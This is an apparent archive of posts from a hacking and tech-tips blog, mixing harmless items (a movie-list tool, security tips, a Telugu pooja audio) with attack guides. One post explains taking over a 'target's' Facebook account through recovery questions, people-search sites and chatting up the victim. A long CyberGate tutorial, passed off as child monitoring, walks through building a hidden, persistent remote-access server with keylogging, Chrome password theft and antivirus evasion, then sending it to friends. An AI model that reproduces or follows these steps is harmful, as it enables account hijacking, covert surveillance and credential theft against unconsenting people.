How many times have you wondered which movie to watch from a collection of 100s of Movie lists that are simply sitting in your College LAN or your friend's hard disk? I stumbled across this amazing tool quite recently and it tool does exactly that. All you have to do is, input your movie list. It automatically gets the movie name, IMDB URL, rating, awards,cast,description. And you elegantly sort them out too according to the rating!

How to Use?

First go to the online tool, its called IMDBnator.com
Then you can input the movie list that you already have. If you just want to test the tool, you can "Extract" and it will process the default list that it already has.
Once you enter your required movie list you will get a huge comparison table that is nice,neat and sorted.
There is also an option to save the ouput file so that you don't always to use this tool for seeing your movie collection or you can just save the page as HTML page.
That's it! Now you can gladly compare, read the description of all the movies that you have.
For more.Tool Documentation at : http://bragtools.com/blog/bulk-imdb-movie-info-extractor/

Screenshot

Use same Email Address for Creating Multiple Website Accounts

2014-04-11T10:29:00.001-07:00

Well, to be honest, I didn't really know what exactly to write in the title of the post perhaps "How to use same Email Account for Account verification" or "Create Fake Emails for Account Verfication" would have been more appropriate. A simple way to put it.Suppose I have my email account "blahblah@gmail.com" and I have already used this for creating a lets say, a Facebook account,now if I wanted to create another Facebook account, I clearly cannot use the same email address.But wait.. what if I told you that you can actually create another! Basically, with this trick you don't have to create multiple email accounts just for creating accounts at various websites (ie. if your email has already been used for another account on some website). Which means, you can actually not just have 2 or more Facebook accounts with the same email address.

Instructions:

Note: You will be needing a Gmail Account for this. It does not work with other email providers.

Assume that your email address "johnsnow@gmail.com" has already been registered on Facebook.
Typically, if I had to create another account at Facebook, I would probably use another Email ID.
But there is the trick. Instead of giving "johnsnow@gmail.com" as your email, you could also give any other mail that is of the form "john.snow@gmail.com".
That is, gmail has this feature. Any email that has a "." between the characteres is treated as the same mail and hence all the mail that goes to "john.snow@gmail.com" is actually redirected to "johnsnow@gmail.com"
You can use any other form such as
john.snow@gmail.com
j.ohnsnow@gmail.com
johnsno.w@gmail.com
They will all get redirected to "johnsnow@gmail.com".
All the above emails are treated differently by Facebook and hence they can be used for creating Multiple Accounts.

More Info: https://support.google.com/mail/answer/10313?hl=en&ctx=mail

How to Bypass Adf.ly Linkbucks Links Online

2014-04-11T09:18:00.000-07:00

Adf.ly is one of the most popularly used URL shortening services which also happens to be a very handy tool for monetizing from the point of view of a web master. If you spot valuable content being given away to viewers freely, then you are bound to spot an adf.ly , adfoc.us link etc.With this tool, you don't have to download any software or a plugin for your webrowser.You can just enter the adf.ly URL and it will give you the original URL that is sitting behind the adf.ly link!

Instructions:

Go to one of these mirror URLs:

http://dead.comuv.com/
http://de-ads.net/
http://dead.esy.es/

You will see a textbox saying "Paste Here Adf.ly, Adfoc.us, Linkbucks, Bc.Vc links (multiple links, one each lines)". Now paste all the adf.ly,linkbucks or a collection of links ONE by ONE and click "Deadfly!"
That's it! Now you have got the decrypted adf.ly link as shown below!

Screenshot:

New Facebook Message Malware IMG_xxxx.zip

2014-03-28T01:29:00.000-07:00

Alright, there is yet another widespread malware that is spreading on the facebook at the moment.In fact, a friend of mine was infected and I happened to get the this chat message.The moment I received this, I realized it was a virus of some sort.The complete analysis of the malware in particular is simple and has been studied by malware bytes.

I hope you find this post enlightening to prevent such attacks on your computer.

What does it do?

User gets a Facebook instant message from a friend of their’s, which includes the words ‘lol’ and a file waiting to be downloaded.
The user downloads the file because they can assume it can be trusted. The filename matches the usual filename of a photo: ‘IMG_xxxx’.zip.
Once downloaded, the user unzips the file and clicks on what they assume is an image file, still called IMG_xxxx.jar
The JAR file executes, downloads malware and infects the system.
The infected users Facebook account is compromised and then used to send more malware to the users friends.

How to remove it?

Most of the good anti viruses such as Avira,ESET or Malwarebytes Antimalware will automatically detect it. If not you can always download it for free and perform a full scan of your computer.

More info: http://blog.malwarebytes.org/security-threat/2014/03/malicious-messages-foray-facebook/

Hackbook.net Review - Beginner's Guide to Ethical Hacking!

2013-10-24T06:42:00.001-07:00

This is a review of the recent eBook that I wrote. Containing loads of knowledge that I collected over a period of time. It has nearly 14 hacking sections which are totally enlightening and will be new to any hacker. The methods and tools that I have used there have not been discussed completely here or by any other blog out there. That is why I dedicated my eBook to serve the purpose of giving a rich background about Hacking.

Non technical writing for easy understanding
Descriptive screenshots to explain better
Powerful Tools
50 Pages of "NO BULLSHIT" content
Each section is independent of the previous section (Around 3-4 pages of each section)

It tells you various ways of protecting and also hacing email Accounts such as Facebook,Gmail,Yahoo. How to hack websites. And most importantly, it provides FREE Hacking Tools! Over 30+ hacking tools are given for free.

You can get it here: Hackbook | Learn How to Hack

10 Top Computer Security Tips

2012-06-19T23:40:00.001-07:00

Your computer holds some of your most important—and private—information, so we’ve written down the 10 top safety computer tips that help you keep your computer and your information safe. Some tips are very common but are often over looked.Here I specify the very basic of securities required for a computer without which leaves the computer vulnerable to malware attacks and also hackers.

Use Anti-Virus Software

Anti-virus software is your best protection against the worst kind of computer problems—viruses. Although most viruses spread through email and Internet downloads, some spread directly through the network and other spread through USB disk drives.There’s too many ways for an virus to get on your computer for you to try to guard against all of them, so the first step you take to secure your computer should be to install good anti-virus software.

But even more important than installing the anti-virus software is keeping it updated. Most anti-virus software will update itself—just make sure you don’t disable updating in the configuration or go too long without connecting to the Internet.

Anti-virus software can only protect your computer against known viruses. Hackers are writing new viruses everyday, so its important to also follow the rest of the tips in this article to keep yourself safe.

Beware of Downloading

The easiest way for hackers to install malware (bad programs) on your computer is by convincing you to install them yourself. Most malware on the Web hides as small but useful-sounding programs. For example, new screen savers, new chat applications, and minor desktop improvements.

The software you thought you were installing quietly installs a few extra programs you didn’t ask for. Some of these programs display ads, some of them report details about your computer to hackers, some of them may even open ports—short for portals—that allow hackers to access your computer.

It’s hard to tell which software is legitimate and which software is genuinely useful, but if you have any doubt about a program, it’s best left uninstalled.

Don’t Trust Email

Do you trust your mother? Of course you do, so why wouldn’t you download the attachment she sent you in her latest email?

Viruses know that people trust their friends and family, and they often exploit this by sending rouge emails containing viruses to unsuspecting users. It’s not that your mother would ever intentionally try to infect your computer with a virus—she doesn’t know the attachment she sent you contains a virus.

A specific type of hacker called phisers also use fake emails from respected Internet companies to try to get your passwords. After they get your password, they’ll try to use it to empty your online bank accounts.

All of this means only one thing: don’t trust email. Don’t download attachments unless they’re in in a safe file format. Don’t click on links in your email and enter your password. With the state of email today, it’s ok to be a little paranoid. There are a few things for you to do to try and stop spam emails, but again it takes common sense mostly.

Investigate

Is there something goofy about your computer? Is it running slow? Are you getting strange error messages? Is your ISP complaining that you’re sending too many emails?

All of these problems need to be investigated. Viruses often use your computer processing power for evil, making your computer run slow. Viruses often try to hide among other programs, causing strange error messages. Viruses often send spam emails, making your ISP complain.

If you see a problem, start investigating it and don’t stop until you figure out what the problem was. Otherwise you risk letting a small virus install bigger, worse viruses.

Restrict Administrative Access

In a household or office where many people share computers, everyone is at the mercy of everyone else. No matter how safe you try to keep your computer, anyone else with administrator access can install a virus-infected program.

In these multi-user environments, it pays to restrict administrator access to only the users who know how to keep the computer safe. In fact, I suggest you create just one administrator account for each computer and then give every user their own non-administrator account.

Only when you need to install a program or change a setting should you use the administrator account. For everything else, you should use your own user account. This helps avoid the situation where you accidentally leave your administrator account logged in and the next person on the computer uses it to accidentally download a virus.

Backup always!

A couple weeks ago shortly after a thunderstorm, I heard fire sirens down the street from my house. There had been a giant nearby bolt of lightning and the power was still out, so I went to investigate—one of my neighbors’ houses was on fire. It was tragic.

I don’t know how much they lost, but it made me think of what I’d lose if my own house caught fire. I realized that many of the things I’d miss most were stored on my computer. So, as soon as the power returned, I double-checked that my backups were still running as expected. I checked all my external hard drives and other backup storage devices I use.

Nothing can keep your data safer than backing it up. We’ve covered several great easy-to-use backup solutions in other articles, and we still recommend Mozy for affordable complete backups. They offer free 2Gb storage and promise better security.

Watch Your Kids

Kids these days grow up with the Internet, and that means they’re exposed to all of the Internet’s less savory aspects from an early age. It’s easy enough to install some parental control software and then assume that your kids are safe—but they’re not.

If there’s one thing I’ve learned about kids, it’s that they’re ingenious little buggers. Worse, your kids probably know your computer better than you do. No mere technology is going to stop them from getting into trouble.

The best way to keep your kids safe is to watch them when they browse the Internet. That may sound hard, but it can be quite easy—just put the family computer in the room where you or your spouse spend most of your time—for example, the kitchen or the living room.

You may also want to check the kid’s Web browser logs, but beware—if the kids know you do this, they’ll find ways of removing entries. A better method would be to check the hostname access logs on your router, but again, a crafty kid will eventually figure out how to fool even that.

Different Websites, Different Passwords

You’ve probably grown used to reading in computer news how such-and-such big site has been hacked and all of its usernames and passwords were stolen. It may not seem terribly important—after all, most sites don’t store any financial information.

But hackers know that most people use the same username and password for different websites. John Smith very likely uses the same password for his Yahoo! email account that he does for his PayPal account. Minutes after breaking into Smith’s email account, the hackers could use PayPal to empty his bank account.

Each site you use should have a different password—or, at the very least, you should use a different password for each site with access to your financial information. Protecting your online accounts is extremely important so do not neglect this!

Encrypt Sensitive Files

Even if you work really hard at avoiding viruses and other malware, you should prepare yourself for the chance that one will make it onto your computer any way. Backups protect your files from being deleted, but what protects your sensitive files from hackers?

The only thing that can protect your sensitive files is encryption. Higher-end versions of Windows include encryption, but you can also download a free encryption utility that provides just as much security (if not more—Microsoft is under pressure by some governments to put a “back door” into their encryption.)
To secure your files against hackers and other prying eyes, I suggest the free TrueCrypt encryption software.

A Firewall

There’s a big difference between good and bad anti-virus software, but the same isn’t true of firewall software. Even the free firewall that comes with all recent versions of Windows will fully protect your computer against automatic network virus attacks. Just make sure you turn it on in the control panel.

If your anti-virus software comes with a firewall, I suggest you use that instead—not because it’s better, but because it will probably be easier for you to use. And keeping things simple is its own safety computer tips.

Thanks and Cheers!
John

Recover Your Microsoft Office 2010 Key

2011-12-16T09:06:00.000-08:00

ProduKey is a small utility which helps recover the original product ID and CD key of MS Office 2010/ Office 2007 and Office 2003. This software is very useful if you lost your original MS office 2010 CD or serial number and you want to reinstall it on your computer.

What is Produkey ?

With ProduKey, you can find the Microsoft Office serial number of your current operating system or remote computer using command line options.

You must also try: Free Microsoft Office 2007 & 2010 Product Keys

How to use ?

For using this software, extract the files to any folder and then run the executable file with name produkey.exe.

For extracting the product key of MS Office from all the remote computers in your network, use the below command line option.

/remoteall – This command will load the product keys from all the computers in your network which you have admin privileges.

Other command line examples
produkey.exe /remote \\Server01
produkey.exe /remotefile "c:\temp\computers.txt"
produkey.exe /regfile "F:\WINNT\system32\config\software"
produkey.exe /windir "c:\winnt" /shtml "c:\temp\pk.html"
produkey.exe /remoteall
produkey.exe /remotealldomain MyDomain
produkey.exe /iprange 192.168.1.10 192.168.1.50
produkey.exe /stab "" >> c:\temp\prd.txt
produkey.exe /OfficeKeys 0 /WindowsKeys 1 /shtml f:\temp\keys.html

System requirements
Works on Windows 2000/XP/2003/2008/Vista/7.

Software Summary
ProduKey finds the product key of MS Office 2010 with which you have initially installed Microsoft office on your computer.

File Details:
Download: ProduKey
File Size: 46.6 KB
File Extension: .zip (Compressed Archive)

Download CEH v6 eBook - Free Courseware

2011-11-05T09:24:00.000-07:00

What is CEH?

The Certified Ethical Hacker (C|EH) is a professional certification provided by the International Council of E-Commerce Consultants (EC-Council.)

An Ethical Hacker is one name given to a Penetration Tester. An ethical hacker is usually employed by an organization who trusts him or her to attempt to penetrate networks and/or computer systems, using the same methods as a hacker, for the purpose of finding and fixing computer security vulnerabilities.

A Certified Ethical Hacker has obtained a certification in how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a hacker.

The exam code for C|EH is 312-50. The certification is in Version 7.1 as of 14 June 2011.

About this courseware: – It covers modules 1 – 25 in the classroom. The self study Modules 26 to 67 and Modules 11,12,13 and 21 will not be covered in the classroom and the student needs to study these on their own student needs to study these on their own.

File Details:

Download:
CEH Courseware v6 Part 1,2,3 (Fileserve)
CEH Courseware v6 Part 1 (Mediafire)
CEH Courseware v6 Part 2 (Mediafire)
CEH Courseware v6 Part 3 (Mediafire)

File Size:

Total: 256 MB / 3 Parts: 95 MB Each

File Extension: .rar (Compressed Archive)

Download Varalakshmi Vratham | Sri Suktham Audio

2011-10-24T10:47:00.000-07:00

Hi guys,I know this is totally out off topic but I want upload this as a tribute to my grandfather.He is a very good and talented person with a lot of interests and one of them being Telugu Literature.In this post I'll be providing 2 of hist recording which will help you to person "Varalakshmi Vratham" and "Sri Suktum" in Telugu.These recordings give you a full detailed description of the pooja and how to perform it along side.Even though the quality of sound is not perfect it still audible.This is also a valid pooja for Telugu Lakshmi Pooja

Here is the Download Link for both the files.These are audio files.

Sound 1.mp3

Sound 2.mp3

Note: Both the recordings are in Telugu and only people who follow Telugu can understand this Pooja.Please leave a "Thanks" comment if it came of use.My mother will someday show it my Grandad !

If your not understanding what is going on! Just skip this post and go the next one!Its hard to explain.

Keywords: Varalakshmi Pooja,Varalakshmi Kalash Pooja,Sravana VaraLakshmi Vratham

Security Alert: Hack Facebook Password Recovery

2011-10-24T10:08:00.000-07:00

This is a very good technique that can be used to restore and retrieve any Facebook account as long you have at least smallest of a clue of the person whom you want to hack.If not,I'll provide you a few sties which will help you find out more about him and quite easily answer his recovery settings.Even though this method has only 50%-50% chances of recovering a password.It is at least worth a try.If not we have to go to other alternative options of Facebook Hacking available to those badass hackers.

MAKE SURE YOU PROTECT YOUR ACCOUNT FROM ANY SUCH ATTEMPTS MADE BY YOUR FRIENDS AS A JOKE.

Matching Faces

I thought about this method as I was showing a friend through Teamviewer the pictures that Facebook was showing me to identify the target's friends. And obviously, I was clueless because I did not whom i was even trying to hack.

What did I do? Well, as you can see the screenshot.

1.Suspicion

2.Security question

3.Confirm Identity

4.Confirm identity by identifying the friends on that account.

Before you try answering any of the questions go to some of these sites and check out what they do.They give you list of email address,nicknames,phone number and other details which the user would have entered on the "World Wide Web".

1.http://com.lullar.com/

2.http://www.pipl.com/email/

3.http://www.spokeo.com

4.http://www.emailfinder.com

5.http://www.zabasearch.com/

6.http://www.zoominfo.com

Also you can check this as well :

Free Facebook Hacking Software
How to Hack Facebook Password in 5 Ways

Facebook provides the names of the target's friends. So, use that information to essentially bypass the security of identification by searching those names on Facebook search and matching the faces based on the Target's friends.

It will only ask you match faces if you are logging in with the correct password or if you get picked up from a different location.

Note that will need an extra Facebook account to search, otherwise Facebook does not let you search. Close the 'Suspicion' page and log in to your extra or your actual Facebook account and search for the Target's friends.

Be sure to notice where your target lives so on the results you can compare whether if the friend is the matching face or not. Be sure to notice the names of the friends as well.

For example, if the name choices are:
George Bush
Adolf Hitler
Barrack Obama
Mohammed Ali
Lee Chang

And the picture given is of an middle eastern descent looking person, you should obviously go with the name that sounds middle eastern.

Once you match the faces for the identification questions. You should be able to get in without a problem.

Apart from just blindly following this method.You should also try to apply a little of your head into this game.You can actually chat with your victim and extract all the details !

CyberGate Tutorial and Free Download

2011-10-23T05:36:00.000-07:00

In this article I'll be showing you how to install and setup a software called "Cybergate".This is a very effective Children Monitoring software.These genre of Programs are commonly called "RATs (Remote Administration Tools)".With this tool,it is possible to keep a complete watch on your child and his activities on the computer .But you have to make sure you install a file called "server.exe" some how or the other.The details I'll be providing here.

This is probably the best way to keep track of your loved ones. Especially your children's Internet activity.

Features of CyberGate:

Managers:
File Manager
Process Manager
Service Manager
Device Manager
Window Manager
Regitry Manager
Installed Programs
Active Port list

Spy:
Screen Capture
Webcam Capture
Password Recovery
Keylogger
Audio Capture

Network Tools:
Socks 4/5 Proxy
HTTP Proxy
Send File
Download and Execute
Open Webpage
URL Redirection

Extras:
Dos Prompt
Quick Search (for logs)
Chat
Extras (open-close CD-ROM etc.)
And Alot More!

Setting up and Installing Cybergate:

First of all download the software from this link.Make sure you don't download them from any website as such as it might be infected with some virus.Please make sure you disable your Anti-Virus before doing this as it might be detected as well.Don,t Worry the Anti-Virus is just over precautionary and tons of users worldwide you this software.If no you can always good about it !

File Details:
Download: Free Download Cybergate v1.07.5 RAT
File Size: 2.28 MB
File Extension: .rar (Compressed Archive)

1. Start off by going to No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"

3. Now It's Time To "Choose Your Host Name".

Hostname: YourHostName.no-ip.biz
Host Type: DNS Host (A)

Don't Care About The Rest, Once You've Choosen Your Host Name, Press "Create Host" In The Lower Right Bottom.

The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up , Log In With Your No-ip Username , Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.

Note: Always Have No-IP Open When You Have Cybergate Open!

There! Your No-IP Host !

Setting Up Cybergate 1.07.5

1. Extract The Cybergate File You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It,Wait 20 Seconds For The Agreement To Pass!

2. When It's Open, Press: Control Center,Start.

3. Press: Control Center , Options , Select Listening Ports

4. Once You've Pressed The "Select Listening Ports" This Window Should Appear:

5.Firstly, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"

Active Ports: The Port You Will Forward Later!
Connections: Limit: The Max Amount Of Victims You Can Have.
Connection Password: The Connection Password. Use "123456"
[V] Show Password: (Shows Password)

Once This Is Done, Press "Save"!

6. Now We'll Go To The: Control Center , Build , Create Server.

User: First, Press "New" And Name It To: "Plutonium". Once Done, Press "OK"

Now Just Double Click On "Plutonium" Or Press "Plutonium" And Then Press "Forward"

7. Now We're In The "Connection" Tab.

First, Press "127.0.0.1 - 999" And Then Press Delete.Now Press "Add" And Write Your Hostname In It + :100.Like This:

YourHostName.No-ip.biz:100

Change The Identification To: Cyber
Change The PW To: 123456

Note: If You Want To Try The Server On Yourself, Then Delete Both:

- 127.0.0.1:999
- YourHostName.No-ip.biz

And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means "Local Computer or LAN Internet"

Make The DNS/HostName Server First Though!

DNS: Your Host Name, EG:
Quote:
YourHostName.no-ip.biz
Port: The Port You Will Forward Later.
Identification: The slave Name
PW: The Password You Wrote In The Options, "123456"

8. Once You're Done With Theese, You'll Move On To The "Installation" Tab.

9. Have The Same Settings As I Do, And Follow The Instructions In The Image!

Install Directory: Where The Server Installs,

%System%
%Windows%
%Root%
%Program Files%
%Other%

Use The "System"!

Boot: This Is The "Startup" Option. Have Everything Checked.Press "Random" 5 Times And It Will Startup On Your slave Everytime They Start Their Computer!

Directory: Where The Virus Folder Installs
File Name: What The File Will Be Inside The Folder.
Inject Into: What Process It Injects into, Use Default Browser!
[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.
Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!

There We Go, You've Now Completed The "Installation" Tab! Skip The Message of Keylogger Since They Are Pre-Set Already!

10. You Should Now Have Trumbled Into The "Antis" Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)

Ok, The Final Tab.. "Creation Of The Server". Have Every Setting As Me!

[V] Use Icon: Yes
[V] Delayed Execution: (How Many Seconds It Takes Until Your Server Injects And They Pop Up In Your RAT)
[V] Google Chrome PW: Yes, Steals Their GC Passwords :)
[X] Bind Files: No, Get An Real Binder Instead! (Have Your Server Crypted Though First!)
[X] Compress With UPX: Makes The Server Smaller But More AV's Detects It!

So after doing all that you have successfully setup your own RAT server which is ready to be tested on yours friends !

Troubleshooting:

Make Sure That....

1.You are properly port-forwarded if using a router.
2.You have the No-IP Client installed and running.
3.Your DNS entries are correctly spelled when building your server.
4.The password in Listening Ports and the password your server uses are identical.
5.You are Listening on the correct ports.
6.Your Firewall is letting connections through on the port you're listening on.
7.Your server is added to excluded files in your Antivirus and Firewall.

What next ?

Now all you have to do is send this file to your friend and make sure he opens it.Once he does so he just won't realize that you actually infected him and your getting all the data from his computer.Make sure you use it only to prank and not to misuse this tool in any way !

Credits: Plutonium

Premium Link Generator Search Engine

2011-10-09T06:27:00.000-07:00

So how many times have you wanted to download your favorite movie and also luckily manage to find it and end up without a premium account !I know it has happened tons of times to everyone.Ofcourse it happened to me serveral times,so then your pursuit of a premium account starts and it usually never ends! That's why we go for Rapidleech Servers! So that we can get premium link downloads for free! The site which I'm going to showcase today is a blog which is created recently and is updated with the most fresh fresh servers! So all you have to do it just go to this blog whenever you want to download a premium link.Find a site and then use it to get a premium download link for free !

Website: Premium Link Generator Engine

This is my blog which i started and therefore you can always share your thoughts and give ideas either here or there!

How to use this Blog ?

1.Just go to the website mentioned.You will have a list of categories where you can check the server from which you want to download the file.

2.Then go the label and you'll find a bunch of such servers which help you to download.

3.Select one of the posts and then select it and go to the website as given in the post.

4.Enter the file URL in the rapidleech server and then you'll automatically get a premium link download for your file !

5.The last thing you have to do is.Give your vote on whether its working or not so that everyone can know of its status !

Enjoy !